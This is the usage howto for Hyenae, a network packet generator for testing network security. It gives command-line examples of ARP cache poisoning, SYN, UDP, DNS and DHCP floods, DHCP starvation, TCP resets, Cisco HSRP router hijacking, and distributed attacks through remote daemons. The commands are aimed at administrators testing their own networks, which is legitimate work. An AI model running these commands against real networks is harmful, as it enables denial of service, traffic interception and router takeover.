------------------------------------------------------------------------------Hyenae Howto ------------------------------------------------------------------------------Hyenae Advanced Network Packet Generator Copyright (C) 2009 - 2010 Robin Richter Contact : richterr@users.sourceforge.

net Homepage : http://sourceforge.net/projects/hyenae/ ------------------------------------------------------------------------------1. Introduction The following document is a brief overview of the Hyenae utility suite and its command line usage. The following paragraphs outline how Hyenae can be used to reproduce low level ethernet attack scenarios (such as MITM, DoS and DDoS) to reveal potential security vulnerabilities of your network. Some examples are enumerated here to illustrate the potential of the Hyenae utility suite. These concise examples are aimed at users such as network administrators or analysts, and assume advanced technical knowledge. For a complete overview of all possible command line arguments, please refer to the README file or the Manpages. ------------------------------------------------------------------------------2. Getting Started * You will need to install the latest version of Hyenae (See INSTALL) * You should know how address patterns work (See README or Manpages) * You should have a strong knowledge of how the ethernet works (See RFC)

------------------------------------------------------------------------------3. Determining Available Network Interfaces Firstly, you will need to select the network interface to operate on. You can obtain a list of all available network interfaces and the corresponding interface index, by starting Hyenae with the -l argument. On UNIX-based operating systems, you will need root privileges to run Hyenae. # hyenae -l * Initializing * Obtaining network interfaces > 1. en0 > 2. fw0 > 3. en1 > 4. lo0 * Finished: 4 network interfaces found You may provide the network interface either by name, using -i argument, or by index, using -I argument. On Windows-based operating systems, you should use only the interface index to select the network interface. ------------------------------------------------------------------------------4. Selecting an Attack Protocol The next step is to determine the attack protocol you want to use. Choose an attack protocol based on the kind of attack you want to launch. You can obtain a list of all available attack protocols by starting Hyenae with the -L argument. # hyenae -L * Initializing * Obtaining available attacks > arp-request > arp-reply > pppoe-discover

> icmp-echo > icmp-unreach-tcp > tcp > udp > dns-query > dhcp-discover > dhcp-request > dhcp-release > hsrp-hello > hsrp-coup > hsrp-resign * Finished: 14 attack protocols available You can provide the attack protocol by its name (-a). The attack protocols use different address patterns and in certain cases, may require additional protocol-dependent arguments. For more information about the required address pattern format and supplementary arguments of each attack protocol, please refer to the README file or the Manpages. ------------------------------------------------------------------------------5. Attack Examples Here are a few examples of what you can do with the Hyenae utility suite. The following attack examples are based on known attack scenarios against a fictional host. Most of the examples outlined below will be possible only if the target host is on the same subnet as you are. 5.1 ARP-Request Flood This example will send an unlimited amount of ARP-Request packets from a random source to all available machines on the network. # hyenae -I 3 -a arp-request -s % -d ff:ff:ff:ff:ff:ff \ # -S %-% -D 00:00:00:00:00:00-192.168.0.1 NOTE: The hardware address strip of the source and the sender address pattern will be equaly randomized to avoid corrupt packets. 5.2 ARP-Cache Poisoning

This example will send an ARP-Reply packet from a fictional source address to all available machines on the network. # hyenae -I 3 -a arp-reply -s 00:f0:21:03:c6:00 -d ff:ff:ff:ff:ff:ff \ # -S 11:22:33:44:55:66-192.168.0.1 -D ff:ff:ff:ff:ff:ff0.0.0.0 -c 1 5.4 Blind PPPoE Session Initiation Flood This example sends and inlimited amount of PPPoE-DIscovery packets with set PADI flag and an incrementing session id from a random source address to all available machines on the network. # hyenae -I 3 -a pppoe-discover -o padi -s % -d ff:ff:ff:ff:ff:ff 5.5 Blind PPPoE Session Termination This example sends and inlimited amount of PPPoE-DIscovery packets with set PADT flag and an incrementing session id from an existing source adress to an existing destination address. # hyenae -I 3 -a pppoe-discover -o padt -s 11:22:33:44:55:66 \ # -d 44:55:66:77:88:99 -q 1 -Q 1 5.6 ICMP-Echo Flood This example will send a random amount of ICMP-Echo packets between 1 and 10000 from a random source to a fictional target. # hyenae -I 3 -a icmp-echo -s %-% -d 00:f0:21:03:c6:00192.168.0.1 \ # -c 1 -C 10000 5.7 ICMP-Smurf Attack This example will send an unlimited amount of ICMP-Echo packets from an existing source address against a network broadcast address. # hyenae -I 3 -a icmp-echo -s 00:f0:21:03:c6:00-192.168.0.1 \ # -d ff:ff:ff:ff:ff:ff-255.255.255.255

5.8 ICMP Based TCP-Connection Reset This example will send a single ICMP "Destination Unreachable" packet with the message code "Port unreachable", from a fictional source to a fictional target. The secondary source and destination patterns are used to set the source and dstination of the TCP packet that is attached at the end of the ICMP packet. # # # # # # hyenae -I 3 -a icmp-unreach-tcp -o port \ -s 00:c0:33:d4:03:06-192.168.0.2 \ -d 00:f0:21:03:c6:00-192.168.0.1 \ -S 00:c0:33:d4:03:06-192.168.0.2@1093 \ -D 00:f0:21:03:c6:00-192.168.0.1@21 \ -C 1

5.9 TCP-SYN Attack This example will send an unlimited amount of TCP packets with set SYN flag, from a random source to a fictional target, with a random send delay between 1 and 1000 milliseconds. # hyenae -I 3 -a tcp -f s -s %-%@%%%% -d 00:f0:21:03:c6:00192.168.0.1@21 \ # -e 1 -E 1000 5.10 TCP-Land Attack This example will send a single TCP packet with set SYN flag and an identical source and destination address. # hyenae -I 3 -a tcp -f s -s 00:f0:21:03:c6:00192.168.0.1@139 \ # -d -d 00:f0:21:03:c6:00-192.168.0.1@139 -c 1 5.11 Blind TCP-Connection Reset This example will send an unlimited amount of TCP packets with set RST flag, from a fictional random source to a fictional target, with an incrementing TCP sequence number.

# hyenae -I 3 -a tcp -f r -s 00:c0:33:d4:03:06192.168.0.2@1093 \ # -d 00:f0:21:03:c6:00-192.168.0.1@21 -q 1 -Q 1 5.12 UDP-Flood This example will send an unlimited amount of UDP packets with a random payload of 100 Byte, from a fictional random source to a fictional target. # hyenae -I 3 -a udp -s %-%@%%%% -d 00:f0:21:03:c6:00192.168.0.1@130 -p 100 5.13 DNS-Query flood This example will send an unlimited amount of DNS query packets from a random source to an existing DNS server. # hyenae -I 3 -a dns-query -s %-% -d 00:f0:21:03:c6:00192.168.0.1 \ # -y www.google.com 5.14 DHCP-Discover Flood This example will send an unlimited amount of DHCP-Discover packets from a random source to all available machines on the network. The second example shows the same attack with activated "Requested IP-Address" option. # hyenae -I 3 -a dhcp-discover -s %-0.0.0.0 \ # -d ff:ff:ff:ff:ff:ff-255.255.255.255 # hyenae -I 3 -a dhcp-discover -s %-0.0.0.0 \ # -d ff:ff:ff:ff:ff:ff-255.255.255.255 -S 192.168.%.%% 5.15 DHCP-Starvation Attack This example will send an unlimited amount of DHCP-Request packets from a random source to all available machines on the network. The DHCP-Option "Server Identifier" is set to the IP-Address of the destination DHCP-Server. The second example shows the same attack with activated "Requested IP-Address" option.

# hyenae -I 3 -a dhcp-request -s %-0.0.0.0 \ # -d ff:ff:ff:ff:ff:ff-255.255.255.255 -D 192.168.0.1 # hyenae -I 3 -a dhcp-request -s %-0.0.0.0 \ # -d ff:ff:ff:ff:ff:ff-255.255.255.255 -S % -D 192.168.0.1 5.16 DHCP-Release Forcing This example will send a single DHCP-Release packet from a fictional source address to a fictional DHCP-Server. The DHCP-Option "Server Identifier" is set to the IP-Address of the destination DHCP-Server. # hyenae -I 3 -a dhcp-release -s 11:22:33:44:55:66192.168.0.2 \ # -d 44:55:66:77:88:99-192.168.0.1 -D 192.168.0.1 -c 1 5.17 Cisco HSRP Active Router Hijacking This example will send an unlimited amount of HSRP-Hello packets with set 'active' state and default authentification from a fictional source address to the HSRP multicast address in an interval of 3 seconds. The virtual IP-Address in this example is 172.16.40.1, the priority 1 (highest) and the group number is 172. # hyenae -I 3 -a hsrp-hello -o active -s 11:22:33:44:55:66192.168.0.2 \ # -d 172.16.40.1 -z 1 -g 172 -e 3000 ------------------------------------------------------------------------------6. Starting the attack assistant Since Hyenaes range of arguments makes it a very powerfull tool to experienced network specialists and administrators, it can be way to complex for unexperienced users. In order to provide an easy way to set up attack scenarios without having deeper knowledge of the attack procedural itself, Hyenae features a text based attack assistant that will guide unexperienced

users through the setup of common attack scenarios. You can activate the attack assistant by simply starting Hyenae without any argument. # hyenae * Initializing * Starting attack assistant Select operation mode: > 1. Local > 2. Remote (Single Daemon) > 3. Remote (Multiple Daemons) Enter option [1-3]: ... ------------------------------------------------------------------------------7. Setting Up the Hyenae Daemon Hyenae comes with a daemon for setting up remote attacks. The daemon can be started with just a few arguments. The only required arguments are the network interface to start incoming remote attack requests from, and either a packet count or a duration limit. For a list of all available daemon options, please see the README file or the Manpages. # hyenaed -I 3 -u 10000 * * * * * * Initializing Starting daemon Opening network interface (en1) Opening log file (/var/log/hyenaed.log) Binding server to *@666 Hyenae Daemon v0.36-1: Online

If the port argument is unspecified, the daemon will listen on port 666 by default. Alternatively, you can specify the port to listen on with the -p argument. By default the Hyenae daemon will bind it's server socket to

any capable network interfaces of your machine. If you want to make the daemon available on a specific network interface only, you have to specify the IP-Address of the network interface you want to bind it to instead by using the -a argument. # hyenaed -I 3 -a 192.168.0.2 -u 10000 * * * * * * Initializing Starting daemon Opening network interface (en1) Opening log file (/var/log/hyenaed.log) Binding server to 192.168.0.2@666 Hyenae Daemon v0.36-1: Online

------------------------------------------------------------------------------8. Starting a Remote Attack Starting a remote attack is similar to starting a local one. However, instead of defining a network interface to operate on, you will need to specify the remote daemon(s) you want to launch the attack from. You can specify either a single remote attack daemon to attack from (-r), or multiple ones by passing a file containing the list of remote daemon addresses (-R). On UNIX-based operating systems you will need root privileges to run the Hyenae daemon. # hyenae -r 127.0.0.1@666 -a icmp-echo -s %-%@% -d %-%@% Initializing Launching remote attack Acquiring daemon on 127.0.0.1@666 Sending remote attack requests Receiving remote attack results Waiting for 127.0.0.1 > No errors > Finished: 96950 packets sent (4071900 bytes) in 10.0 seconds * Finished: 96950 packets sent (4071900 bytes) in 10.2 seconds Note that unless you specify an attack limitation (a packet count and/or an attack duration), the maximum packet count and/or attack * * * * * *

duration limit of the remote daemon will be used. -------------------------------------------------------------------------------